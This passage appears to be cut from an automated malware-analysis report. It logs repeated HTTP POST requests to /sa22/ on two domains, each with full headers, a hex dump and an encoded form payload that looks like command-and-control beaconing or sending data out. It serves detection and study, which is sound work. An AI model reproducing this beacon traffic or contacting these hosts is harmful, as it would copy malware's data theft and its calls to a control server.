xL3hLB=FOBWv7wu6-W8GRHNQpQjJhnbgSRJVgWn19VeyzYrB8kpJB3EiXvfQWy_~RlfBb8oGA6UczBmNYYkyDijjDSAgZyVsYjPEBNCusfW47jicRGDA91UW6cL
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 164312Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 35 51 45 34 50 69 68 51 33 61 75 46 72 38 43 41 53 6e 56 73 44 42 64 4b 6e 37 42 32 71 45 42 79 33 6c 73 4a 65 4d 42 65 78 48 45 7a 42 54 59 57 32 79 38 32 78 6c 59 51 72 35 52 50 33 6d 6d 63 7a 70 4d 4e 59 67 6e 34 68 71 6d 6a 54 54 49 67 35 76 75 71 59 33 55 45 48 55 69 75 4b 47 46 75 72 76 69 44 78 75 64 63 6f 51 57 42 4c 67 36 73 4d 57 52 54 64 4f 61 41 53 7e 65 4d 31 66 6d 34 71 52 46 52 6d 6a 34 48 6b 6f 7a 43 68 6b 4a 4a 36 36 58 45 35 47 59 4f 48 38 46 6c 46 64 6c 79 6f 45 55 66 65 7a 72 50 4c 62 75 4f 41 70 4f 71 6a 45 56 41 79 44 61 28 50 36 43 53 33 4e 51 61 44 6c 6a 28 4c 54 42 48 64 37 68 30 31 70 6c 74 59 4f 59 42 45 66 79 36 4c 72 38 48 4c 36 53 69 43 45 4e 30 32 52 70 52 35 6b 2d 72 48 64 56 73 6e 6b 75 6d 51 32 6c 4a 37 35 41 6b 54 43 74 6e 65 63 45 6f 4b 28 37 39 35 34 52 73 54 4a 52 31 4a 64 51 4b 75 50 43 45 5f 61 64 6b 73 72 32 39 55 69 39 66 78 52 39 51 34 36 56 76 45 42 35 76 5a 57 45 33 6c 47 51 61 58 6f 35 58 51 62 70 5a 4b 64 54 44 68 50 67 38 43 6a 4f 50 4c 4e 75 65 55 4f 55 56 44 6f 51 56 4a 6d 31 6f 54 62 63 54 4b 6d 33 79 69 4f 49 4d 63 79 2d 64 37 39 4e 69 35 56 48 62 41 42 72 64 6e 4d 4b 38 36 44 46 71 54 49 50 31 59 4f 67 68 4c 6b 57 61 57 73 6e 59 4c 46 7a 4a 5f 51 57 69 39 32 74 45 52 37 6b 50 45 7e 58 45 5a 68 69 66 4d 28 73 66 6a 54 6c 79 63 28 7a 31 44 56 75 35 76 7a 38 35 55 66 53 33 66 53 31 5a 4d 53 6d 28 70 56 71 6a 38 43 72 6c 69 66 56 4c 33 62 77 34 77 41 75 35 32 7a 48 34 38 43 34 28 51 66 52 35 7a 70 6f 6d 74 71 67 44 72 36 45 64 69 61 79 32 42 33 
62 50 63 66 59 47 50 34 59 6f 56 4c 45 6d 4f 59 45 70 5f 7a 37 34 33 71 4e 66 44 55 65 49 68 61 4b 28 66 76 35 7e 4d 44 31 63 73 43 33 53 42 75 72 77 63 28 74 7e 44 49 77 4d 49 51 56 4f 4c 4e 55 47 58 75 6d 59 56 7a 74 6d 61 28 61 43 4d 69 6f 42 53 73 62 58 4d 38 71 71 41 42 62 35 78 31 49 43 79 64 46 63 47 67 37 61 51 55 38 59 53 70 4d 66 38 66 76 73 34 70 63 30 59 56 75 67 53 41 77 33 63 32 50 52 33 64 55 6c 6e 77 38 74 54 44 38 75 4f 65 63 4f 72 69 6a 50 53 38 58 6e 37 38 7a 6b 35 47 37 35 59 77 6b 7e 4e 63 35 45 4a 6e 43 35 6e 61 51 4d 47 33 4f 41 44 6c 36 4a 66 33 42 61 65 51 52 42 65 63 78 79 73 73 43 30 51 47 6d 28 74 62 38 73 51 65 6c 67 38 73 76 64 58 4c 4f 68 76 39 65 35 58 45 32 67 55 33 61 70 78 77 63 77 4e 37 51 33 36 61 6e 46 6f 64 4b 6c 68 6a 69 46 72 4b 35 5a 64 59 67 46 53 65 64 37 4c 61 62 79 70 49 33 69 4b 50 37 56 64 4e 2d 69 43 61 41 44 4f 33 4c 44 69 62 67 54 70 34 58 37 42 79 42 6d 37 6b 35 7a 4d 4d 2d 33 63 55 31 59 55 6b 4b 75 6d 59 36 7a 52 33 71 31 45 6b 35 77 33 38 48 5a 78 4c 65
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 37 77 75 36 2d 57 38 47 52 48 4e 51 70 51 6a 4a 68 6e 62 67 53 52 4a 56 67 57 6e 31 39 56 65 79 7a 59 72 42 38 6b 70 4a 42 33 45 69 58 76 66 51 57 79 5f 7e 52 6c 66 42 62 38 6f 47 41 36 55 63 7a 42 6d 4e 59 59 6b 79 44 69 6a 6a 44 53 41 67 5a 79 56 73 59 6a 50 45 42 4e 43 75 73 66 57 34 37 6a 69 63 52 47 44 41 39 31 55 57 36 63 4c 72 49 4f 4a 63 5f 50 4f 63 78 36 32 44 7a 4f 31 39 76 77 6a 55 55 28 78 43 6b 35 6d 49 53 45 77 46 4b 65 75 50 61 36 4c 4b 6b 59 42 6b 41 78 74 75 35 45 58 41 2d 72 70 5a 62 72 35 4b 78 38 70 35 43 30 42 41 31 65 69 34 35 36 54 59 51 4e 59 62 79 70 4e 6e 70 28 44 43 63 36 69 77 32 51 47 76 62 6d 33 4e 68 69 75 39 62 32 6d 43 4f 28 58 6d 51 30 6d 79 48 4e 39 43 4e 6f 43 72 55 51 59 6c 47 55 42 38 6e 71 4d 51 61 56 49 6a 52 4f 66 70 65 63 76 71 4b 28 33 31 70 35 75 70 54 4e 65 78 61 56 75 53 39 65 4a 45 73 4f 33 33 65 76 49 35 32 66 4c 5a 52 52 68 45 59 72 69 70 57 74 69 71 65 7e 30 39 46 47 54 65 56 77 77 58 51 61 53 5a 4f 70 35 41 78 72 67 74 48 32 4b 4a 6f 31 79 63 55 50 49 57 54 34 53 63 66 4b 62 6f 54 44 63 53 5f 4b 4e 7a 56 53 49 47 71 57 39 64 61 39 4e 73 70 56 48 43 51 41 46 53 6b 35 41 77 4e 6a 44 68 46 39 30 39 64 62 73 74 5a 74 53 41 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
xL3hLB=FOBWv7wu6-W8GRHNQpQjJhnbgSRJVgWn19VeyzYrB8kpJB3EiXvfQWy_~RlfBb8oGA6UczBmNYYkyDijjDSAgZyVsYjPEBNCusfW47jicRGDA91UW6cLrIOJc_POcx62DzO19vwjUU(xCk5mISEwFKeuPa6LKkYBkAxtu5EXA-rpZbr5Kx8p5C0BA1ei456TYQNYbypNnp(DCc6iw2QGvbm3Nhiu9b2mCO(XmQ0myHN9CNoCrUQYlGUB8nqMQaVIjROfpecvqK(31p5upTNexaVuS9eJEsO33evI52fLZRRhEYripWtiqe~09FGTeVwwXQaSZOp5AxrgtH2KJo1ycUPIWT4ScfKboTDcS_KNzVSIGqW9da9NspVHCQAFSk5AwNjDhF909dbstZtSAg).
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 164312Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 35 51 45 34 50 69 68 51 33 61 75 46 72 38 43 41 53 6e 56 73 44 42 64 4b 6e 37 42 32 71 45 42 79 33 6c 73 4a 65 4d 42 65 78 48 45 7a 42 54 59 57 32 79 38 32 78 6c 59 51 72 35 52 50 33 6d 6d 63 7a 70 4d 4e 59 67 6e 34 68 71 6d 6a 54 54 49 67 35 76 75 71 59 33 55 45 48 55 69 75 4b 47 46 75 72 76 69 44 78 75 64 63 6f 51 57 42 4c 67 36 73 4d 57 52 54 64 4f 61 41 53 7e 65 4d 31 66 6d 34 71 52 46 52 6d 6a 34 48 6b 6f 7a 43 68 6b 4a 4a 36 36 58 45 35 47 59 4f 48 38 46 6c 46 64 6c 79 6f 45 55 66 65 7a 72 50 4c 62 75 4f 41 70 4f 71 6a 45 56 41 79 44 61 28 50 36 43 53 33 4e 51 61 44 6c 6a 28 4c 54 42 48 64 37 68 30 31 70 6c 74 59 4f 59 42 45 66 79 36 4c 72 38 48 4c 36 53 69 43 45 4e 30 32 52 70 52 35 6b 2d 72 48 64 56 73 6e 6b 75 6d 51 32 6c 4a 37 35 41 6b 54 43 74 6e 65 63 45 6f 4b 28 37 39 35 34 52 73 54 4a 52 31 4a 64 51 4b 75 50 43 45 5f 61 64 6b 73 72 32 39 55 69 39 66 78 52 39 51 34 36 56 76 45 42 35 76 5a 57 45 33 6c 47 51 61 58 6f 35 58 51 62 70 5a 4b 64 54 44 68 50 67 38 43 6a 4f 50 4c 4e 75 65 55 4f 55 56 44 6f 51 56 4a 6d 31 6f 54 62 63 54 4b 6d 33 79 69 4f 49 4d 63 79 2d 64 37 39 4e 69 35 56 48 62 41 42 72 64 6e 4d 4b 38 36 44 46 71 54 49 50 31 59 4f 67 68 4c 6b 57 61 57 73 6e 59 4c 46 7a 4a 5f 51 57 69 39 32 74 45 52 37 6b 50 45 7e 58 45 5a 68 69 66 4d 28 73 66 6a 54 6c 79 63 28 7a 31 44 56 75 35 76 7a 38 35 55 66 53 33 66 53 31 5a 4d 53 6d 28 70 56 71 6a 38 43 72 6c 69 66 56 4c 33 62 77 34 77 41 75 35 32 7a 48 34 38 43 34 28 51 66 52 35 7a 70 6f 6d 74 71 67 44 72 36 45 64 69 61 79 32 42 33 
62 50 63 66 59 47 50 34 59 6f 56 4c 45 6d 4f 59 45 70 5f 7a 37 34 33 71 4e 66 44 55 65 49 68 61 4b 28 66 76 35 7e 4d 44 31 63 73 43 33 53 42 75 72 77 63 28 74 7e 44 49 77 4d 49 51 56 4f 4c 4e 55 47 58 75 6d 59 56 7a 74 6d 61 28 61 43 4d 69 6f 42 53 73 62 58 4d 38 71 71 41 42 62 35 78 31 49 43 79 64 46 63 47 67 37 61 51 55 38 59 53 70 4d 66 38 66 76 73 34 70 63 30 59 56 75 67 53 41 77 33 63 32 50 52 33 64 55 6c 6e 77 38 74 54 44 38 75 4f 65 63 4f 72 69 6a 50 53 38 58 6e 37 38 7a 6b 35 47 37 35 59 77 6b 7e 4e 63 35 45 4a 6e 43 35 6e 61 51 4d 47 33 4f 41 44 6c 36 4a 66 33 42 61 65 51 52 42 65 63 78 79 73 73 43 30 51 47 6d 28 74 62 38 73 51 65 6c 67 38 73 76 64 58 4c 4f 68 76 39 65 35 58 45 32 67 55 33 61 70 78 77 63 77 4e 37 51 33 36 61 6e 46 6f 64 4b 6c 68 6a 69 46 72 4b 35 5a 64 59 67 46 53 65 64 37 4c 61 62 79 70 49 33 69 4b 50 37 56 64 4e 2d 69 43 61 41 44 4f 33 4c 44 69 62 67 54 70 34 58 37 42 79 42 6d 37 6b 35 7a 4d 4d 2d 33 63 55 31 59 55 6b 4b 75 6d 59 36 7a 52 33 71 31 45 6b 35 77 33 38 48 5a 78 4c 65
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 37 77 75 36 2d 57 38 47 52 48 4e 51 70 51 6a 4a 68 6e 62 67 53 52 4a 56 67 57 6e 31 39 56 65 79 7a 59 72 42 38 6b 70 4a 42 33 45 69 58 76 66 51 57 79 5f 7e 52 6c 66 42 62 38 6f 47 41 36 55 63 7a 42 6d 4e 59 59 6b 79 44 69 6a 6a 44 53 41 67 5a 79 56 73 59 6a 50 45 42 4e 43 75 73 66 57 34 37 6a 69 63 52 47 44 41 39 31 55 57 36 63 4c 72 49 4f 4a 63 5f 50 4f 63 78 36 32 44 7a 4f 31 39 76 77 6a 55 55 28 78 43 6b 35 6d 49 53 45 77 46 4b 65 75 50 61 36 4c 4b 6b 59 42 6b 41 78 74 75 35 45 58 41 2d 72 70 5a 62 72 35 4b 78 38 70 35 43 30 42 41 31 65 69 34 35 36 54 59 51 4e 59 62 79 70 4e 6e 70 28 44 43 63 36 69 77 32 51 47 76 62 6d 33 4e 68 69 75 39 62 32 6d 43 4f 28 58 6d 51 30 6d 79 48 4e 39 43 4e 6f 43 72 55 51 59 6c 47 55 42 38 6e 71 4d 51 61 56 49 6a 52 4f 66 70 65 63 76 71 4b 28 33 31 70 35 75 70 54 4e 65 78 61 56 75 53 39 65 4a 45 73 4f 33 33 65 76 49 35 32 66 4c 5a 52 52 68 45 59 72 69 70 57 74 69 71 65 7e 30 39 46 47 54 65 56 77 77 58 51 61 53 5a 4f 70 35 41 78 72 67 74 48 32 4b 4a 6f 31 79 63 55 50 49 57 54 34 53 63 66 4b 62 6f 54 44 63 53 5f 4b 4e 7a 56 53 49 47 71 57 39 64 61 39 4e 73 70 56 48 43 51 41 46 53 6b 35 41 77 4e 6a 44 68 46 39 30 39 64 62 73 74 5a 74 53 41 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
xL3hLB=FOBWv7wu6-W8GRHNQpQjJhnbgSRJVgWn19VeyzYrB8kpJB3EiXvfQWy_~RlfBb8oGA6UczBmNYYkyDijjDSAgZyVsYjPEBNCusfW47jicRGDA91UW6cLrIOJc_POcx62DzO19vwjUU(xCk5mISEwFKeuPa6LKkYBkAxtu5EXA-rpZbr5Kx8p5C0BA1ei456TYQNYbypNnp(DCc6iw2QGvbm3Nhiu9b2mCO(XmQ0myHN9CNoCrUQYlGUB8nqMQaVIjROfpecvqK(31p5upTNexaVuS9eJEsO33evI52fLZRRhEYripWtiqe~09FGTeVwwXQaSZOp5AxrgtH2KJo1ycUPIWT4ScfKboTDcS_KNzVSIGqW9da9NspVHCQAFSk5AwNjDhF909dbstZtSAg).
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 164312Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 35 51 45 34 50 69 68 51 33 61 75 46 72 38 43 41 53 6e 56 73 44 42 64 4b 6e 37 42 32 71 45 42 79 33 6c 73 4a 65 4d 42 65 78 48 45 7a 42 54 59 57 32 79 38 32 78 6c 59 51 72 35 52 50 33 6d 6d 63 7a 70 4d 4e 59 67 6e 34 68 71 6d 6a 54 54 49 67 35 76 75 71 59 33 55 45 48 55 69 75 4b 47 46 75 72 76 69 44 78 75 64 63 6f 51 57 42 4c 67 36 73 4d 57 52 54 64 4f 61 41 53 7e 65 4d 31 66 6d 34 71 52 46 52 6d 6a 34 48 6b 6f 7a 43 68 6b 4a 4a 36 36 58 45 35 47 59 4f 48 38 46 6c 46 64 6c 79 6f 45 55 66 65 7a 72 50 4c 62 75 4f 41 70 4f 71 6a 45 56 41 79 44 61 28 50 36 43 53 33 4e 51 61 44 6c 6a 28 4c 54 42 48 64 37 68 30 31 70 6c 74 59 4f 59 42 45 66 79 36 4c 72 38 48 4c 36 53 69 43 45 4e 30 32 52 70 52 35 6b 2d 72 48 64 56 73 6e 6b 75 6d 51 32 6c 4a 37 35 41 6b 54 43 74 6e 65 63 45 6f 4b 28 37 39 35 34 52 73 54 4a 52 31 4a 64 51 4b 75 50 43 45 5f 61 64 6b 73 72 32 39 55 69 39 66 78 52 39 51 34 36 56 76 45 42 35 76 5a 57 45 33 6c 47 51 61 58 6f 35 58 51 62 70 5a 4b 64 54 44 68 50 67 38 43 6a 4f 50 4c 4e 75 65 55 4f 55 56 44 6f 51 56 4a 6d 31 6f 54 62 63 54 4b 6d 33 79 69 4f 49 4d 63 79 2d 64 37 39 4e 69 35 56 48 62 41 42 72 64 6e 4d 4b 38 36 44 46 71 54 49 50 31 59 4f 67 68 4c 6b 57 61 57 73 6e 59 4c 46 7a 4a 5f 51 57 69 39 32 74 45 52 37 6b 50 45 7e 58 45 5a 68 69 66 4d 28 73 66 6a 54 6c 79 63 28 7a 31 44 56 75 35 76 7a 38 35 55 66 53 33 66 53 31 5a 4d 53 6d 28 70 56 71 6a 38 43 72 6c 69 66 56 4c 33 62 77 34 77 41 75 35 32 7a 48 34 38 43 34 28 51 66 52 35 7a 70 6f 6d 74 71 67 44 72 36 45 64 69 61 79 32 42 33 
62 50 63 66 59 47 50 34 59 6f 56 4c 45 6d 4f 59 45 70 5f 7a 37 34 33 71 4e 66 44 55 65 49 68 61 4b 28 66 76 35 7e 4d 44 31 63 73 43 33 53 42 75 72 77 63 28 74 7e 44 49 77 4d 49 51 56 4f 4c 4e 55 47 58 75 6d 59 56 7a 74 6d 61 28 61 43 4d 69 6f 42 53 73 62 58 4d 38 71 71 41 42 62 35 78 31 49 43 79 64 46 63 47 67 37 61 51 55 38 59 53 70 4d 66 38 66 76 73 34 70 63 30 59 56 75 67 53 41 77 33 63 32 50 52 33 64 55 6c 6e 77 38 74 54 44 38 75 4f 65 63 4f 72 69 6a 50 53 38 58 6e 37 38 7a 6b 35 47 37 35 59 77 6b 7e 4e 63 35 45 4a 6e 43 35 6e 61 51 4d 47 33 4f 41 44 6c 36 4a 66 33 42 61 65 51 52 42 65 63 78 79 73 73 43 30 51 47 6d 28 74 62 38 73 51 65 6c 67 38 73 76 64 58 4c 4f 68 76 39 65 35 58 45 32 67 55 33 61 70 78 77 63 77 4e 37 51 33 36 61 6e 46 6f 64 4b 6c 68 6a 69 46 72 4b 35 5a 64 59 67 46 53 65 64 37 4c 61 62 79 70 49 33 69 4b 50 37 56 64 4e 2d 69 43 61 41 44 4f 33 4c 44 69 62 67 54 70 34 58 37 42 79 42 6d 37 6b 35 7a 4d 4d 2d 33 63 55 31 59 55 6b 4b 75 6d 59 36 7a 52 33 71 31 45 6b 35 77 33 38 48 5a 78 4c 65
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 37 77 75 36 2d 57 38 47 52 48 4e 51 70 51 6a 4a 68 6e 62 67 53 52 4a 56 67 57 6e 31 39 56 65 79 7a 59 72 42 38 6b 70 4a 42 33 45 69 58 76 66 51 57 79 5f 7e 52 6c 66 42 62 38 6f 47 41 36 55 63 7a 42 6d 4e 59 59 6b 79 44 69 6a 6a 44 53 41 67 5a 79 56 73 59 6a 50 45 42 4e 43 75 73 66 57 34 37 6a 69 63 52 47 44 41 39 31 55 57 36 63 4c 72 49 4f 4a 63 5f 50 4f 63 78 36 32 44 7a 4f 31 39 76 77 6a 55 55 28 78 43 6b 35 6d 49 53 45 77 46 4b 65 75 50 61 36 4c 4b 6b 59 42 6b 41 78 74 75 35 45 58 41 2d 72 70 5a 62 72 35 4b 78 38 70 35 43 30 42 41 31 65 69 34 35 36 54 59 51 4e 59 62 79 70 4e 6e 70 28 44 43 63 36 69 77 32 51 47 76 62 6d 33 4e 68 69 75 39 62 32 6d 43 4f 28 58 6d 51 30 6d 79 48 4e 39 43 4e 6f 43 72 55 51 59 6c 47 55 42 38 6e 71 4d 51 61 56 49 6a 52 4f 66 70 65 63 76 71 4b 28 33 31 70 35 75 70 54 4e 65 78 61 56 75 53 39 65 4a 45 73 4f 33 33 65 76 49 35 32 66 4c 5a 52 52 68 45 59 72 69 70 57 74 69 71 65 7e 30 39 46 47 54 65 56 77 77 58 51 61 53 5a 4f 70 35 41 78 72 67 74 48 32 4b 4a 6f 31 79 63 55 50 49 57 54 34 53 63 66 4b 62 6f 54 44 63 53 5f 4b 4e 7a 56 53 49 47 71 57 39 64 61 39 4e 73 70 56 48 43 51 41 46 53 6b 35 41 77 4e 6a 44 68 46 39 30 39 64 62 73 74 5a 74 53 41 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
xL3hLB=FOBWv7wu6-W8GRHNQpQjJhnbgSRJVgWn19VeyzYrB8kpJB3EiXvfQWy_~RlfBb8oGA6UczBmNYYkyDijjDSAgZyVsYjPEBNCusfW47jicRGDA91UW6cLrIOJc_POcx62DzO19vwjUU(xCk5mISEwFKeuPa6LKkYBkAxtu5EXA-rpZbr5Kx8p5C0BA1ei456TYQNYbypNnp(DCc6iw2QGvbm3Nhiu9b2mCO(XmQ0myHN9CNoCrUQYlGUB8nqMQaVIjROfpecvqK(31p5upTNexaVuS9eJEsO33evI52fLZRRhEYripWtiqe~09FGTeVwwXQaSZOp5AxrgtH2KJo1ycUPIWT4ScfKboTDcS_KNzVSIGqW9da9NspVHCQAFSk5AwNjDhF909dbstZtSAg).
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.zhiguohulian.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.zhiguohulian.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.zhiguohulian.com/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 4a 62 44 6a 44 68 79 57 7e 5a 68 36 55 45 78 74 45 32 30 77 55 6d 30 4f 28 31 4f 34 62 74 38 39 4f 46 62 4c 39 54 59 2d 4b 79 49 7a 51 4c 72 73 55 4a 73 66 6b 77 52 46 4c 57 74 6e 37 4f 48 72 7a 57 45 43 4b 4e 6f 38 78 70 58 6c 46 2d 4d 47 39 49 31 6f 71 55 66 4b 7e 32 4f 43 41 2d 4c 46 46 65 64 34 74 46 7e 55 76 76 6e 4a 32 4f 59 6b 6f 50 42 76 7a 5a 34 6b 4d 5a 4d 77 6a 4a 36 66 70 34 7e 4a 79 77 4b 73 69 59 49 74 63 67 68 46 57 51 73 54 37 4b 68 67 65 74 54 36 78 52 42 59 28 48 50 6b 44 71 41 32 36 43 6f 67 70 4c 48 6c 43 6f 50 37 4c 6b 41 69 73 6e 77 74 6d 6a 59 5a 71 63 35 59 4c 74 71 51 65 6b 4b 56 43 7a 62 33 72 74 32 75 43 6a 75 58 75 75 77 4e 44 41 37 39 4d 7a 6c 5a 77 4f 6a 5a 30 66 4c 65 37 67 68 75 50 45 4e 30 4c 67 4e 57 75 77 72 48 68 59 52 5a 4d 41 4b 44 34 61 79 72 65 4c 69 70 66 35 62 74 6f 4a 37 4d 66 54 42 62 48 63 30 45 55 6e 74 54 46 51 4f 68 44 36 7e 63 37 58 76 49 64 67 69 67 62 45 7a 6d 5a 6a 56 78 44 49 48 38 62 73 65 65 4b 35 6f 64 32 6b 4e 4d 52 4d 44 63 7a 35 5a 50 52 6d 49 2d 4f 38 68 67 70 6c 63 42 69 6f 6e 54 32 6c 77 37 62 77 77 54 59 59 54 5a 76 4e 58 66 57 73 6d 54 63 64 4d 54 47 33 6b 4a 49 54 4a 65 71 55 44 77 28 76 52 58 77 64 64 4e 57 32 79 6e 73 51 29 2e 00 74 5a 74 53 41 67 29 Data Ascii: 
xL3hLB=JbDjDhyW~Zh6UExtE20wUm0O(1O4bt89OFbL9TY-KyIzQLrsUJsfkwRFLWtn7OHrzWECKNo8xpXlF-MG9I1oqUfK~2OCA-LFFed4tF~UvvnJ2OYkoPBvzZ4kMZMwjJ6fp4~JywKsiYItcghFWQsT7KhgetT6xRBY(HPkDqA26CogpLHlCoP7LkAisnwtmjYZqc5YLtqQekKVCzb3rt2uCjuXuuwNDA79MzlZwOjZ0fLe7ghuPEN0LgNWuwrHhYRZMAKD4ayreLipf5btoJ7MfTBbHc0EUntTFQOhD6~c7XvIdgigbEzmZjVxDIH8bseeK5od2kNMRMDcz5ZPRmI-O8hgplcBionT2lw7bwwTYYTZvNXfWsmTcdMTG3kJITJeqUDw(vRXwddNW2ynsQ).tZtSAg)
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.zhiguohulian.comConnection: closeContent-Length: 164312Cache-Control: no-cacheOrigin: http://www.zhiguohulian.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.zhiguohulian.com/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 4a 62 44 6a 44 67 72 74 37 70 6c 52 54 77 4a 54 54 33 67 64 64 57 4d 4d 34 46 43 30 62 5f 38 48 44 31 6e 62 39 53 6f 36 43 51 38 68 62 4b 62 73 63 72 55 59 70 77 52 43 4e 57 74 6b 28 4f 44 66 74 78 5a 4f 4b 4d 74 68 78 70 66 6b 4d 66 63 44 7a 34 30 75 73 30 43 5f 32 58 72 65 41 37 53 76 47 34 74 65 6f 46 36 55 72 66 28 50 7a 72 38 5f 38 64 6c 30 36 4e 59 68 66 72 63 35 67 36 7e 4e 70 64 28 65 36 53 7e 75 6d 74 49 6b 51 44 4a 74 48 58 59 57 33 37 46 6e 43 65 75 77 76 43 56 45 34 44 37 57 66 35 59 31 7a 54 41 70 35 62 32 61 45 63 28 6f 4a 31 77 59 73 67 4e 59 71 78 38 49 75 66 4e 51 4d 63 6e 31 57 32 36 4c 65 30 76 76 6d 49 71 66 50 48 53 34 78 36 30 47 45 52 57 39 42 57 35 4a 76 37 47 76 34 4c 6a 61 6f 53 4a 34 43 31 46 47 57 77 39 35 6a 58 32 42 70 72 4a 42 4e 47 53 31 39 36 7a 5f 63 4c 69 54 4c 5a 62 5a 76 4a 28 57 61 41 4a 78 4b 5f 6b 50 55 32 41 50 4c 79 71 66 4e 2d 28 71 35 48 76 2d 46 42 66 66 66 56 48 76 63 6b 39 46 48 49 47 6b 51 50 33 53 4b 35 70 6b 32 6c 4e 6d 44 4a 54 63 68 39 56 36 42 56 77 69 5a 73 68 48 35 6c 4d 48 70 5f 6e 44 32 6b 59 37 61 42 42 4f 5a 72 44 5a 38 4d 6e 59 48 50 7e 54 4a 74 4d 54 4c 58 6c 4f 48 78 6f 55 73 53 4b 58 7e 76 34 69 77 4c 73 2d 59 31 48 73 75 34 76 70 43 32 62 4b 75 68 63 34 34 69 57 68 68 42 39 7a 70 59 4a 47 41 33 6b 70 58 50 64 75 59 73 58 33 79 37 42 65 28 37 73 53 36 43 75 4e 7e 35 6b 77 79 45 68 38 33 51 39 64 54 32 77 58 44 62 76 4b 58 75 41 51 55 55 59 73 69 54 57 5a 49 61 32 44 38 2d 77 53 51 48 7e 6f 39 5a 69 6a 4c 43 35 47 7e 53 41 4d 41 68 72 58 53 35 43 4f 71 49 
28 69 4a 59 73 61 30 69 54 4b 72 6a 37 66 7a 57 73 65 6b 7a 34 43 61 6f 4b 77 75 5a 6d 68 4e 53 68 79 4c 65 52 75 63 6e 54 66 36 63 46 4a 76 32 4e 44 5a 56 46 35 54 66 46 43 28 55 67 44 66 32 71 52 4c 74 39 41 73 62 67 59 28 68 73 55 46 67 39 53 52 45 61 6c 43 30 4e 43 49 70 48 43 67 5f 53 53 64 61 53 70 31 59 4c 49 4d 53 64 50 7a 32 36 54 43 65 52 55 35 64 49 5f 48 38 78 41 57 57 4c 35 65 33 6c 36 5a 4d 73 64 5a 38 48 30 6a 41 28 76 6d 75 74 42 69 77 6f 6e 41 2d 30 5a 47 67 30 6c 79 4b 74 41 39 70 6f 7a 36 79 32 4c 7a 38 4a 6f 49 69 38 43 49 34 54 71 56 50 38 33 72 4c 37 6b 70 64 72 69 39 52 37 6d 6a 46 45 44 34 30 6b 73 38 43 44 61 43 66 72 76 66 2d 57 5f 55 53 65 6e 49 65 4a 61 36 51 45 76 64 7a 78 46 43 30 55 46 77 4b 4e 59 57 53 7e 7a 79 76 70 4e 50 51 46 69 63 56 33 4a 55 6a 45 67 58 77 7a 68 43 35 70 6f 58 39 72 31 44 64 62 39 34 62 55 6f 65 63 6d 54 5a 6f 51 65 50 47 49 32 4c 76 51 61 33 58 4c 4a 49 6e 5a 46 52 74 58 79 79 7a 77 47 64 5a 46 57 73 73 58 41 67 4a 59 71 63 47 56 77 32 41 34 47 65 45 43
